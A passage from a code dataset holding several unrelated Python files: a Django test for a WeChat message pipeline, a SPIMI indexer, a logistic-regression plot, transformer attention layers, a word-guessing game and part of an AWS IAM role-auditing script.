\"\"\"\r\n\r\n__author__ = 'chuter'\r\n\r\n\r\nif __name__ == '__main__':\r\n\timport sys\r\n\tsys.path.insert(0, '../../')\r\n\tsys.path.insert(0, '../')\r\n\r\nfrom weixin.handler.handler_testutil import *\r\ninit_handler_test_env()\r\n\r\nimport unittest\r\n\r\nfrom handler.weixin_message import parse_weixin_message_from_xml\r\nfrom handler.message_handler import *\r\n\r\nfrom message_pipeline import *\r\n\r\nfrom django.http import HttpRequest\r\n\r\nfrom watchdog.utils import *\r\n\r\nclass DummyHandlerWithoudProcessing(MessageHandler):\r\n\r\n\tdef handle(self, context, is_from_simulator=False):\r\n\t\treturn None\r\n\r\nclass DummyHandlerWithDummyProcessing(MessageHandler):\r\n\r\n\tdef handle(self, context, is_from_simulator=False):\r\n\t\tmessage = context.message\r\n\t\treturn message.msgId\r\n\r\nclass DummyHandlerThrowException(MessageHandler):\r\n\r\n\tdef handle(self, context, is_from_simulator=False):\r\n\t\traise ValueError('i am told to be')\r\n\r\nclass DummyNonMessageHandler():\r\n\tpass\r\n\r\n\r\nclass DummyPreProcessingHandler(object):\r\n\tdef pre_processing(self, context, is_from_simulator=False):\r\n\t\tif context.request.GET.has_key('pre_process_count'):\r\n\t\t\tcontext.request.GET['pre_process_count'] = context.request.GET['pre_process_count'] + 1\r\n\t\telse:\r\n\t\t\tcontext.request.GET['pre_process_count'] = 1\r\n\r\nclass DummyPreProcessingHandlerWithException(object):\r\n\tdef pre_processing(self, context, is_from_simulator=False):\r\n\t\traise ValueError('i am told to be')\r\n\r\nclass DummyPostProcessingHandler(object):\r\n\tdef post_processing(self, context, handler, response, is_from_simulator=False):\r\n\t\tif context.request.GET.has_key('post_process_count'):\r\n\t\t\tcontext.request.GET['post_process_count'] = context.request.GET['post_process_count'] + 1\r\n\t\telse:\r\n\t\t\tcontext.request.GET['post_process_count'] = 1\r\n\r\nclass DummyPostProcessingHandlerWithException(object):\r\n\tdef post_processing(self, context, handler, response, is_from_simulator=False):\r\n\t\traise ValueError('i am told to be')\r\n\r\nDUMMY_MESSAGE = \"\"\"\r\n\t\r\n\t\r\n\t \r\n\t1348831860\r\n\t\r\n\t\r\n\t1234567890123456\r\n\t\r\n\t\"\"\"\r\n\r\ndef build_test_request():\r\n\tdummy_request = HttpRequest()\r\n\tdummy_request.user = getTestUserProfile().user\r\n\r\n\tdummy_request.GET = {}\r\n\tdummy_request._body = DUMMY_MESSAGE\r\n\treturn dummy_request\r\n\r\n\r\nclass MessagePipelineTest(unittest.TestCase):\r\n\r\n\tdef testCreatePipelineWithInvalidParams(self):\r\n\t\ttry:\r\n\t\t\tpipeline = MessagePipeline([])\r\n\t\t\tself.fail()\r\n\t\texcept ValueError: #due to empty handler claeeses\r\n\t\t\tself.assertTrue(True)\r\n\r\n\t\ttry:\r\n\t\t\tpipeline = MessagePipeline(['weixin.message_pipeline_tests.DummyNonMessageHandler'])\r\n\t\t\tself.fail()\r\n\t\texcept ValueError:\r\n\t\t\tself.assertTrue(True)\r\n\r\n\tdef testMessageHandling(self):\r\n\t\tpipeline = MessagePipeline(['weixin.message_pipeline_tests.DummyNonMessageHandler',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyHandlerWithoudProcessing',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyHandlerWithDummyProcessing'])\r\n\r\n\t\tdummy_request = build_test_request()\r\n\t\tresponse = pipeline.handle(dummy_request, getTestUserProfile().shop_name)\r\n\r\n\t\tmessage = parse_weixin_message_from_xml(DUMMY_MESSAGE)\r\n\t\tself.assertEqual(message.msgId, response)\r\n\t\t\r\n\tdef testMessageHandlingWithPreAndPostProcessing(self):\r\n\t\tMessage.objects.all().delete()\r\n\r\n\t\tpipeline = 
MessagePipeline(['weixin.message_pipeline_tests.DummyNonMessageHandler',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyHandlerWithoudProcessing',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyHandlerWithDummyProcessing',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyPreProcessingHandler',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyPreProcessingHandlerWithException',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyPreProcessingHandler',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyPostProcessingHandler',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyPostProcessingHandlerWithException',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyPostProcessingHandler',\r\n\t\t\t\t])\r\n\t\t\r\n\t\tdummy_request = build_test_request()\r\n\t\tresponse = pipeline.handle(dummy_request, getTestUserProfile().shop_name)\r\n\r\n\t\tmessage = parse_weixin_message_from_xml(DUMMY_MESSAGE)\r\n\t\tself.assertEqual(message.msgId, response)\r\n\r\n\t\t#两个handler都分别进行了预处理和后处理\r\n\t\tself.assertEqual(2, dummy_request.GET['pre_process_count'])\r\n\t\tself.assertEqual(2, dummy_request.GET['post_process_count'])\r\n\r\n\t\t#且在进行预处理和后处理期间发生两次异常\r\n\t\tself.assertEqual(2, Message.objects.all().count())\r\n\t\tfor message in Message.objects.all():\r\n\t\t\tself.assertTrue(message.message.find('i am told to be') > 0)\r\n\r\n\tdef testMessageHandlingWithException(self):\r\n\t\tMessage.objects.all().delete()\r\n\r\n\t\t#在某一个handler处理发生异常后中断处理\r\n\t\tpipeline = MessagePipeline(['weixin.message_pipeline_tests.DummyHandlerThrowException',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyHandlerWithDummyProcessing'])\r\n\r\n\t\t\r\n\t\tdummy_request = build_test_request()\r\n\t\tresponse = pipeline.handle(dummy_request, getTestUserProfile().shop_name)\r\n\r\n\t\tself.assertEqual(None, response)\r\n\t\tself.assertEqual(1, Message.objects.all().count())\r\n\t\tself.assertEqual('WEB', Message.objects.all()[0].type)\r\n\t\tself.assertEqual(WATCHDOG_WEB, Message.objects.all()[0].severity)\r\n\r\n\t\t#如果设置在某一个handler处理发生异常后继续后续handler的处理\r\n\t\tpipeline = MessagePipeline(['weixin.message_pipeline_tests.DummyHandlerThrowException',\r\n\t\t\t\t'weixin.message_pipeline_tests.DummyHandlerWithDummyProcessing'], False)\r\n\r\n\t\tresponse = pipeline.handle(dummy_request, getTestUserProfile().shop_name)\r\n\r\n\t\tmessage = parse_weixin_message_from_xml(DUMMY_MESSAGE)\r\n\t\tself.assertEqual(message.msgId, response)\r\n\r\nif __name__ == '__main__':\r\n\tstart_test_withdb()","repo_name":"chengdg/weizoom","sub_path":"weapp/weixin/message/message_pipeline_tests.py","file_name":"message_pipeline_tests.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71034128872","text":"import sys\nimport os\nimport json\n\n# Returns the Token from tokenStream entry\ndef getToken(tokenEntry):\n return tokenEntry[0]\n\n\n# Returns the DocID from tokenStream entry\ndef getDocID(tokenEntry):\n return int(tokenEntry[1])\n\n\n# Deletes the previously created blocks from the directory\ndef cleanDirectory(path):\n fileList = os.listdir(path)\n\n for f in fileList:\n if os.path.isfile(os.path.join(path, f)):\n os.remove(os.path.join(path, f))\n\n print(\"Directory cleaned.\")\n\n\n# Writes a block on disk (mini inverted index)\ndef write_dict_to_file(fileBaseName, fileIndex, block_dictionary):\n fileName = fileBaseName + str(fileIndex) + '.txt'\n dirName = os.path.dirname(fileName)\n\n if not os.path.exists(dirName):\n os.makedirs(dirName)\n\n with 
open(fileName, 'w') as blockFile:\n blockFile.write(json.dumps(block_dictionary, indent=2, sort_keys=True))\n\n print(\"Block dictionary successfully saved to '\" + fileName + \"' file.\")\n\n\n# Processes the tokenStream and generates the inverted index\ndef SPIMI_Invert(tokenStream, fileBaseName):\n fileIndex = 0\n blockSizeLimit = 1 # Max size of block in MB\n block_dictionary = {}\n\n for tokenEntry in tokenStream:\n if (sys.getsizeof(block_dictionary)/1024/1024) >= blockSizeLimit:\n write_dict_to_file(fileBaseName, fileIndex, block_dictionary)\n fileIndex += 1\n block_dictionary = {}\n\n\n tokenEntry_Token = getToken(tokenEntry)\n tokenEntry_DocID = getDocID(tokenEntry)\n\n if tokenEntry_Token in block_dictionary:\n\n if tokenEntry_DocID in block_dictionary[tokenEntry_Token]['docs'].keys():\n block_dictionary[tokenEntry_Token]['docs'][tokenEntry_DocID]['tf'] += 1\n\n else:\n block_dictionary[tokenEntry_Token]['df'] += 1\n block_dictionary[tokenEntry_Token]['docs'][tokenEntry_DocID] = {'tf': 1}\n\n else:\n block_dictionary[tokenEntry_Token] = {'df': 1, 'docs': {tokenEntry_DocID: {'tf': 1}}}\n\n # creates the last block\n write_dict_to_file(fileBaseName, fileIndex, block_dictionary)\n\n\n# Writes the final inverted index on disk\ndef write_full_SPIMI_to_file(SPIMI_directory, full_SPIMI_dictionary):\n fileName = SPIMI_directory + 'SPIMI_dictionary.txt'\n # fileName = SPIMI_directory + 'Unfiltered_SPIMI/unfiltered_SPIMI_dictionary.txt' # Uncomment to get unfiltered tokenStream\n dirName = os.path.dirname(fileName)\n\n if not os.path.exists(dirName):\n os.makedirs(dirName)\n\n with open(fileName, 'w') as blockFile:\n blockFile.write(json.dumps(full_SPIMI_dictionary, indent=2, sort_keys=True))\n\n print(\"SPIMI dictionary successfully saved to '\" + fileName + \"' file.\")\n\n\n# Merges all the blocks (mini inverted indexes) into one inverted index\ndef merge_SPIMI(SPIMI_directory, blockBaseName):\n fileList = [ f for f in os.listdir(SPIMI_directory) if f.startswith(blockBaseName) ]\n fileList = sorted(fileList)\n\n full_SPIMI_dictionary = {}\n\n for fname in fileList:\n blockFile_name = SPIMI_directory + fname\n\n with open(blockFile_name, 'r') as blockFile:\n file_content = blockFile.read()\n blockFile_dictionary = json.loads(file_content)\n\n for blockTerm, blockTerm_data in blockFile_dictionary.items():\n if blockTerm in full_SPIMI_dictionary:\n full_SPIMI_dictionary[blockTerm]['df'] += blockTerm_data['df']\n full_SPIMI_dictionary[blockTerm]['docs'].update(blockTerm_data['docs'])\n else:\n full_SPIMI_dictionary[blockTerm] = {'df': blockTerm_data['df'], 'docs': blockTerm_data['docs']}\n\n write_full_SPIMI_to_file(SPIMI_directory, full_SPIMI_dictionary)\n\n\n\n\n# Execution starts here\nts_file = 'Tokenization/tokenStream.txt'\n# ts_file = 'Tokenization/unfiltered_tokenStream.txt' # Uncomment to get unfiltered tokenStream\n\nif os.path.isfile(ts_file):\n with open(ts_file, 'r') as tokenStream_file:\n file_content = tokenStream_file.read()\n tokenStream = json.loads(file_content)\n\n SPIMI_directory = 'SPIMI/'\n blockBaseName = 'spimi_block_'\n fileBaseName = SPIMI_directory + blockBaseName\n\n # Deletes all the previous files in the directory\n cleanDirectory(SPIMI_directory)\n\n SPIMI_Invert(tokenStream, fileBaseName)\n merge_SPIMI(SPIMI_directory, blockBaseName)\n\nelse:\n print(\"The tokenStream file was not found. 
Please run the 'Tokenizer.py' file first.\")\n","repo_name":"andavazgar/IR_SentimentRanking","sub_path":"SPIMI.py","file_name":"SPIMI.py","file_ext":"py","file_size_in_byte":4546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33136274636","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nimport pandas as pd\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom logistic_regression_model import LogisticRegressionUsingGD\r\nfrom sklearn.metrics import accuracy_score\r\n\r\n\r\ndef load_data(path, header):\r\n marks_df = pd.read_csv(path, header=header)\r\n return marks_df\r\n\r\n\r\nif __name__ == \"__main__\":\r\n data = pd.read_csv(\"data/marks.txt\")\r\n\r\n X = data.iloc[:, :-1]\r\n y = data.iloc[:, -1]\r\n admitted = data.loc[y == 1]\r\n not_admitted = data.loc[y == 0]\r\n\r\n plt.scatter(admitted.iloc[:, 0], admitted.iloc[:, 1], s=10, label='Admitted')\r\n plt.scatter(not_admitted.iloc[:, 0], not_admitted.iloc[:, 1], s=10,\r\n label='Not Admitted')\r\n\r\n\r\n X = np.c_[np.ones((X.shape[0], 1)), X]\r\n y = y[:, np.newaxis]\r\n theta = np.zeros((X.shape[1], 1))\r\n\r\n\r\n model = LogisticRegressionUsingGD()\r\n model.fit(X, y, theta)\r\n accuracy = model.accuracy(X, y.flatten())\r\n parameters = model.w_\r\n \r\n\r\n x_values = [np.min(X[:, 1] - 2), np.max(X[:, 2] + 2)]\r\n y_values = - (parameters[0] + np.dot(parameters[1], x_values)) / parameters[2]\r\n\r\n plt.plot(x_values, y_values, label='Decision Boundary')\r\n plt.xlabel('Marks in 1st Exam')\r\n plt.ylabel('Marks in 2nd Exam')\r\n plt.legend()\r\n plt.show()\r\n","repo_name":"pavels-k/My-algorithms","sub_path":"Machine_learning/logistic_regression.py","file_name":"logistic_regression.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"43696630905","text":"import math\n\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom math import sqrt\nfrom datasets.advanced_loader import TriangularCausalMask, ProbMask\nfrom reformer_pytorch import LSHSelfAttention\nfrom einops import rearrange, repeat\n\n\"\"\"\nThis class contains several variations of the self attention used in transformer\nSome are only less computationally expensive, others have additional changes specifically for time series forecasting\nEach variation is based on a different paper\n\nAutocorrelation inspired from https://github.com/thuml/Autoformer\n@Author MeelsL\n\"\"\"\nclass DSAttention(nn.Module):\n \"\"\"Stationairy Attention used in Autoformer\"\"\"\n\n def __init__(self, mask_flag=True, factor=5, scale=None, attention_dropout=0.1, output_attention=False):\n \"\"\"\n :param mask_flag:\n :param factor:\n :param scale:\n :param attention_dropout:\n :param output_attention:\n \"\"\"\n super(DSAttention, self).__init__()\n self.scale = scale\n self.mask_flag = mask_flag\n self.output_attention = output_attention\n self.dropout = nn.Dropout(attention_dropout)\n\n def forward(self, queries, keys, values, attn_mask, tau=None, delta=None):\n B, L, H, E = queries.shape\n _, S, _, D = values.shape\n scale = self.scale or 1. 
/ sqrt(E)\n\n tau = 1.0 if tau is None else tau.unsqueeze(\n 1).unsqueeze(1) # B x 1 x 1 x 1\n delta = 0.0 if delta is None else delta.unsqueeze(\n 1).unsqueeze(1) # B x 1 x 1 x S\n\n # De-stationary Attention, rescaling pre-softmax score with learned de-stationary factors\n scores = torch.einsum(\"blhe,bshe->bhls\", queries, keys) * tau + delta\n\n if self.mask_flag:\n if attn_mask is None:\n attn_mask = TriangularCausalMask(B, L, device=queries.device)\n\n scores.masked_fill_(attn_mask.mask, -np.inf)\n\n A = self.dropout(torch.softmax(scale * scores, dim=-1))\n V = torch.einsum(\"bhls,bshd->blhd\", A, values)\n\n if self.output_attention:\n return (V.contiguous(), A)\n else:\n return (V.contiguous(), None)\n\n\nclass FullAttention(nn.Module):\n \"\"\"\n Standard attention mechanism\n \"\"\"\n def __init__(self, mask_flag=True, factor=5, scale=None, attention_dropout=0.1, output_attention=False):\n super(FullAttention, self).__init__()\n self.scale = scale\n self.mask_flag = mask_flag\n self.output_attention = output_attention\n self.dropout = nn.Dropout(attention_dropout)\n\n def forward(self, queries, keys, values, attn_mask, tau=None, delta=None):\n \"\"\"\n Self attention mechanism\n \"\"\"\n B, L, H, E = queries.shape\n _, S, _, D = values.shape\n scale = self.scale or 1. / sqrt(E)\n\n #einsum for easier computation\n scores = torch.einsum(\"blhe,bshe->bhls\", queries, keys)\n\n if self.mask_flag:\n if attn_mask is None:\n attn_mask = TriangularCausalMask(B, L, device=queries.device)\n scores.masked_fill_(attn_mask.mask, -np.inf)\n else:\n scores = scores.masked_fill(attn_mask == 1, -np.inf)\n\n A = self.dropout(torch.softmax(scale * scores, dim=-1))\n V = torch.einsum(\"bhls,bshd->blhd\", A, values)\n\n if self.output_attention:\n return (V.contiguous(), A)\n else:\n return (V.contiguous(), None)\n\n\nclass ProbAttention(nn.Module):\n \"\"\"\n Probability attention (used for informer architecture)\n \"\"\"\n def __init__(self, mask_flag=True, factor=5, scale=None, attention_dropout=0.1, output_attention=False):\n super(ProbAttention, self).__init__()\n self.factor = factor\n self.scale = scale\n self.mask_flag = mask_flag\n self.output_attention = output_attention\n self.dropout = nn.Dropout(attention_dropout)\n\n def _prob_QK(self, Q, K, sample_k, n_top):\n \"\"\"\n Compute attention score on subset only\n :param Q: Query vector\n :param K: key vector\n :param sample_k: sample rate\n :param n_top: max size of subset\n :return: computation\n \"\"\"\n B, H, L_K, E = K.shape\n _, _, L_Q, _ = Q.shape\n\n # calculate sample K\n K_expand = K.unsqueeze(-3).expand(B, H, L_Q, L_K, E)\n index_sample = torch.randint(L_K, (L_Q, sample_k))\n K_sample = K_expand[:, :, torch.arange(\n L_Q).unsqueeze(1), index_sample, :]\n Q_K_sample = torch.matmul(\n Q.unsqueeze(-2), K_sample.transpose(-2, -1)).squeeze()\n\n # find the top m using sparsity measurement\n M = Q_K_sample.max(-1)[0] - torch.div(Q_K_sample.sum(-1), L_K)\n M_top = M.topk(n_top, sorted=False)[1]\n\n #compute Q reduced for attention score\n Q_reduce = Q[torch.arange(B)[:, None, None],\n torch.arange(H)[None, :, None],\n M_top, :] # factor*ln(L_q)\n #compute attention with Q reduce\n Q_K = torch.matmul(Q_reduce, K.transpose(-2, -1)) # factor*ln(L_q)*L_k\n\n return Q_K, M_top\n\n def _get_initial_context(self, V, L_Q):\n B, H, L_V, D = V.shape\n if not self.mask_flag:\n # V_sum = V.sum(dim=-2)\n V_sum = V.mean(dim=-2)\n contex = V_sum.unsqueeze(-2).expand(B, H,\n L_Q, V_sum.shape[-1]).clone()\n else: # use a mask (diagonally masked 
attention)\n contex = V.cumsum(dim=-2)\n return contex\n\n def _update_context(self, context_in, V, scores, index, L_Q, attn_mask):\n \"\"\"\n updates context vector\n :param context_in: context in vector\n :param V: Value vector\n :param scores: current scores\n :param index: indices applied to score\n :param L_Q: lower query matrix\n :param attn_mask: attention mask\n :return: updated context vector\n \"\"\"\n B, H, L_V, D = V.shape\n\n if self.mask_flag:\n if attn_mask is None:\n attn_mask = ProbMask(B, H, L_Q, index, scores, device=V.device)\n scores.masked_fill_(attn_mask.mask, -np.inf)\n else:\n attn_mask = ProbMask(B, H, L_Q, index, scores, device=V.device, attn_mask=attn_mask)\n scores = scores.masked_fill(attn_mask.mask == 1, -np.inf)\n\n\n\n attn = torch.softmax(scores, dim=-1) # nn.Softmax(dim=-1)(scores)\n\n context_in[torch.arange(B)[:, None, None],\n torch.arange(H)[None, :, None],\n index, :] = torch.matmul(attn, V).type_as(context_in)\n if self.output_attention:\n attns = (torch.ones([B, H, L_V, L_V]) /\n L_V).type_as(attn).to(attn.device)\n attns[torch.arange(B)[:, None, None], torch.arange(H)[\n None, :, None], index, :] = attn\n return (context_in, attns)\n else:\n return (context_in, None)\n\n def forward(self, queries, keys, values, attn_mask, tau=None, delta=None):\n B, L_Q, H, D = queries.shape\n _, L_K, _, _ = keys.shape\n\n queries = queries.transpose(2, 1)\n keys = keys.transpose(2, 1)\n values = values.transpose(2, 1)\n\n U_part = self.factor * \\\n np.ceil(np.log(L_K)).astype('int').item()\n u = self.factor * \\\n np.ceil(np.log(L_Q)).astype('int').item()\n\n U_part = U_part if U_part < L_K else L_K\n u = u if u < L_Q else L_Q\n\n scores_top, index = self._prob_QK(\n queries, keys, sample_k=U_part, n_top=u)\n\n scale = self.scale or 1. 
/ sqrt(D)\n if scale is not None:\n scores_top = scores_top * scale\n\n context = self._get_initial_context(values, L_Q)\n\n #update context\n context, attn = self._update_context(\n context, values, scores_top, index, L_Q, attn_mask)\n\n return context.contiguous(), attn\n\n\nclass AttentionLayer(nn.Module):\n \"\"\"\n Standard attention layer (part of full attention)\n \"\"\"\n def __init__(self, attention, d_model, n_heads, d_keys=None,\n d_values=None):\n super(AttentionLayer, self).__init__()\n\n d_keys = d_keys or (d_model // n_heads)\n d_values = d_values or (d_model // n_heads)\n\n self.inner_attention = attention\n self.query_projection = nn.Linear(d_model, d_keys * n_heads)\n self.key_projection = nn.Linear(d_model, d_keys * n_heads)\n self.value_projection = nn.Linear(d_model, d_values * n_heads)\n self.out_projection = nn.Linear(d_values * n_heads, d_model)\n self.n_heads = n_heads\n\n def forward(self, queries, keys, values, attn_mask, tau=None, delta=None):\n B, L, _ = queries.shape\n _, S, _ = keys.shape\n H = self.n_heads\n\n queries = self.query_projection(queries).view(B, L, H, -1)\n keys = self.key_projection(keys).view(B, S, H, -1)\n values = self.value_projection(values).view(B, S, H, -1)\n\n out, attn = self.inner_attention(\n queries,\n keys,\n values,\n attn_mask,\n tau=tau,\n delta=delta\n )\n out = out.view(B, L, -1)\n\n return self.out_projection(out), attn\n\n\n\n\n\nclass AutoCorrelation(nn.Module):\n \"\"\"\n Autocorrelation block used for AutoFormer architecture\n \"\"\"\n\n def __init__(self, mask_flag=True, factor=1, scale=None, attention_dropout=0.1, output_attention=False):\n super(AutoCorrelation, self).__init__()\n self.factor = factor\n self.scale = scale\n self.mask_flag = mask_flag\n self.output_attention = output_attention\n self.dropout = nn.Dropout(attention_dropout)\n\n def time_delay_agg_training(self, values, corr):\n \"\"\"\n Computes time delay aggregation\n \"\"\"\n\n head = values.shape[1]\n channel = values.shape[2]\n length = values.shape[3]\n\n top_k = int(self.factor * math.log(length))\n mean_value = torch.mean(torch.mean(corr, dim=1), dim=1)\n index = torch.topk(torch.mean(mean_value, dim=0), top_k, dim=-1)[1]\n weights = torch.stack([mean_value[:, index[i]] for i in range(top_k)], dim=-1)\n\n tmp_corr = torch.softmax(weights, dim=-1)\n\n tmp_values = values\n delays_agg = torch.zeros_like(values).float()\n for i in range(top_k):\n pattern = torch.roll(tmp_values, -int(index[i]), -1)\n delays_agg = delays_agg + pattern * \\\n (tmp_corr[:, i].unsqueeze(1).unsqueeze(1).unsqueeze(1).repeat(1, head, channel, length))\n return delays_agg\n\n def time_delay_agg_inference(self, values, corr):\n \"\"\"\n SpeedUp version of Autocorrelation (a batch-normalization style design)\n This is for the inference phase.\n \"\"\"\n\n batch = values.shape[0]\n head = values.shape[1]\n channel = values.shape[2]\n length = values.shape[3]\n\n\n init_index = torch.arange(length).unsqueeze(0).unsqueeze(0).unsqueeze(0).repeat(batch, head, channel, 1).cuda()\n\n top_k = int(self.factor * math.log(length))\n mean_value = torch.mean(torch.mean(corr, dim=1), dim=1)\n weights, delay = torch.topk(mean_value, top_k, dim=-1)\n\n tmp_corr = torch.softmax(weights, dim=-1)\n\n tmp_values = values.repeat(1, 1, 1, 2)\n delays_agg = torch.zeros_like(values).float()\n for i in range(top_k):\n tmp_delay = init_index + delay[:, i].unsqueeze(1).unsqueeze(1).unsqueeze(1).repeat(1, head, channel, length)\n pattern = torch.gather(tmp_values, dim=-1, index=tmp_delay)\n delays_agg = 
delays_agg + pattern * \\\n (tmp_corr[:, i].unsqueeze(1).unsqueeze(1).unsqueeze(1).repeat(1, head, channel, length))\n return delays_agg\n\n def time_delay_agg_full(self, values, corr):\n \"\"\"\n Standard auto correlation (full time delay slower)\n \"\"\"\n batch = values.shape[0]\n head = values.shape[1]\n channel = values.shape[2]\n length = values.shape[3]\n\n init_index = torch.arange(length).unsqueeze(0).unsqueeze(0).unsqueeze(0).repeat(batch, head, channel, 1).cuda()\n\n top_k = int(self.factor * math.log(length))\n weights, delay = torch.topk(corr, top_k, dim=-1)\n\n tmp_corr = torch.softmax(weights, dim=-1)\n\n tmp_values = values.repeat(1, 1, 1, 2)\n delays_agg = torch.zeros_like(values).float()\n for i in range(top_k):\n tmp_delay = init_index + delay[..., i].unsqueeze(-1)\n pattern = torch.gather(tmp_values, dim=-1, index=tmp_delay)\n delays_agg = delays_agg + pattern * (tmp_corr[..., i].unsqueeze(-1))\n return delays_agg\n\n def forward(self, queries, keys, values, attn_mask):\n \"\"\"\n model train forward\n \"\"\"\n B, L, H, E = queries.shape\n _, S, _, D = values.shape\n if L > S:\n zeros = torch.zeros_like(queries[:, :(L - S), :]).float()\n values = torch.cat([values, zeros], dim=1)\n keys = torch.cat([keys, zeros], dim=1)\n else:\n values = values[:, :L, :, :]\n keys = keys[:, :L, :, :]\n\n #perform fast fourier transform\n q_fft = torch.fft.rfft(queries.permute(0, 2, 3, 1).contiguous(), dim=-1)\n k_fft = torch.fft.rfft(keys.permute(0, 2, 3, 1).contiguous(), dim=-1)\n res = q_fft * torch.conj(k_fft)\n corr = torch.fft.irfft(res, dim=-1)\n\n # time delay aggregation\n if self.training:\n V = self.time_delay_agg_training(values.permute(0, 2, 3, 1).contiguous(), corr).permute(0, 3, 1, 2)\n else:\n V = self.time_delay_agg_inference(values.permute(0, 2, 3, 1).contiguous(), corr).permute(0, 3, 1, 2)\n\n #compute correlation\n if self.output_attention:\n return (V.contiguous(), corr.permute(0, 3, 1, 2))\n else:\n return (V.contiguous(), None)\n\n\nclass AutoCorrelationLayer(nn.Module):\n \"\"\"\n Autocorrelation layers (part of the AutoCorrelation block)\n \"\"\"\n def __init__(self, correlation, d_model, n_heads, d_keys=None,\n d_values=None):\n super(AutoCorrelationLayer, self).__init__()\n\n d_keys = d_keys or (d_model // n_heads)\n d_values = d_values or (d_model // n_heads)\n\n self.inner_correlation = correlation\n self.query_projection = nn.Linear(d_model, d_keys * n_heads)\n self.key_projection = nn.Linear(d_model, d_keys * n_heads)\n self.value_projection = nn.Linear(d_model, d_values * n_heads)\n self.out_projection = nn.Linear(d_values * n_heads, d_model)\n self.n_heads = n_heads\n\n def forward(self, queries, keys, values, attn_mask):\n B, L, _ = queries.shape\n _, S, _ = keys.shape\n H = self.n_heads\n\n\n #compute query, key and values)\n queries = self.query_projection(queries).view(B, L, H, -1)\n keys = self.key_projection(keys).view(B, S, H, -1)\n values = self.value_projection(values).view(B, S, H, -1)\n\n out, attn = self.inner_correlation(\n queries,\n keys,\n values,\n attn_mask\n )\n out = out.view(B, L, -1)\n\n return self.out_projection(out), attn\n\n\n","repo_name":"Meelzak/TimeSeries-Transformer","sub_path":"forecasting/models/layers/SelfAttention_Family.py","file_name":"SelfAttention_Family.py","file_ext":"py","file_size_in_byte":15358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32008255324","text":"# complete word : \r\nprint('hi , this is a completing word game : complete the ap_ _ e 
word ')\r\ne= str(input('guess first chracter of this word : '))\r\nl = str(input('guess next chracter of this word : '))\r\npo= 0 # point \r\na='ap', e ,l , 'e'\r\nif e== 'p' and l== 'l' :\r\n po+=1 \r\n print('win ', po)\r\nelif e== 'p' or l== 'l' :\r\n \r\n print('not far from win , try another time : ')\r\nelse : \r\n print('you lose : ')\r\n \r\n","repo_name":"minhaz72/short_project_in_python","sub_path":"short_project/word_complete.py","file_name":"word_complete.py","file_ext":"py","file_size_in_byte":434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33005809640","text":"import json\nimport re\nimport time\n\nimport boto3\nimport mypy_boto3_iam\n\ntotal_roles = 0\ntotal_policies = 0\naccount_numbers_found = set()\naccount_numbers_allowed = {'736815776541', '831269439992', '349546234265', '944132310209', '972874111695',\n '301497165819'} # known customer accounts\niam_client = boto3.client('iam') # type mypy_boto3_iam.client\naccount_pattern = re.compile('([0-9]{12})')\naccount_pattern_arn = re.compile('arn.*:([0-9]{12}):')\n\n\ndef main():\n print('Listing allowed account numbers')\n with open('../../europace/aws-sso/globals.tf') as file:\n file_content = (file.read())\n allowed_accounts_definition = file_content\n\n global account_numbers_allowed\n account_numbers_allowed = account_numbers_allowed | set(account_pattern.findall(allowed_accounts_definition))\n\n print('Getting initial iam roles')\n roles = iam_client.list_roles()\n\n iterate_roles_with_policies(roles)\n marker: str = roles['Marker']\n\n while marker != 'null':\n roles = iam_client.list_roles(Marker=marker)\n\n if 'Marker' in roles:\n marker = roles['Marker']\n else:\n marker = 'null'\n\n iterate_roles_with_policies(roles)\n\n print(f'Checked {total_roles} roles')\n print(f'Checked {total_policies} policies')\n print(f'Allowed account numbers: {account_numbers_allowed}')\n print(f'Found account numbers: {account_numbers_found}')\n print(f'Suspicious account numbers: {account_numbers_found - account_numbers_allowed}')\n\n\ndef iterate_roles_with_policies(roles):\n global total_roles\n total_roles += len(roles['Roles'])\n total_loop_roles = len(roles['Roles'])\n current_loop_roles = 0\n\n for role in roles['Roles']:\n current_loop_roles += 1\n role_name = role['RoleName']\n global total_policies\n\n print(f'\\n{role_name}:')\n\n marker = None\n while marker != 'null':\n\n inline_policies: dict\n if marker is None:\n inline_policies = iam_client.list_role_policies(RoleName=role_name)\n else:\n inline_policies = iam_client.list_role_policies(RoleName=role_name, Marker=marker)\n\n if 'Marker' in inline_policies:\n marker = inline_policies['Marker']\n else:\n marker = 'null'\n\n total_policies += len(inline_policies['PolicyNames'])\n\n for inline_policy_name in inline_policies['PolicyNames']:\n print(f'[inline] {inline_policy_name}')\n get_and_check_policy(role_name=role_name, policy_name=inline_policy_name, retries=0, is_named=False)\n\n marker = None\n while marker != 'null':\n\n named_policies: dict\n if marker is None:\n named_policies = iam_client.list_attached_role_policies(RoleName=role_name)\n else:\n named_policies = iam_client.list_attached_role_policies(RoleName=role_name)\n\n if 'Marker' in named_policies:\n marker = named_policies['Marker']\n else:\n marker = 'null'\n\n total_policies += len(named_policies['AttachedPolicies'])\n\n for named_policy in named_policies['AttachedPolicies']:\n print('[attached] {0}'.format(named_policy['PolicyName']))\n 
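# A minimal sketch (hypothetical refactor, not part of this script): boto3
# already ships paginators for these IAM list calls, so the hand-rolled
# Marker loops above can be collapsed. 'list_role_policies' is a real
# paginator name; the helper assumes the module-level iam_client defined
# at the top of the script.
def iter_inline_policy_names(role_name: str):
    paginator = iam_client.get_paginator('list_role_policies')
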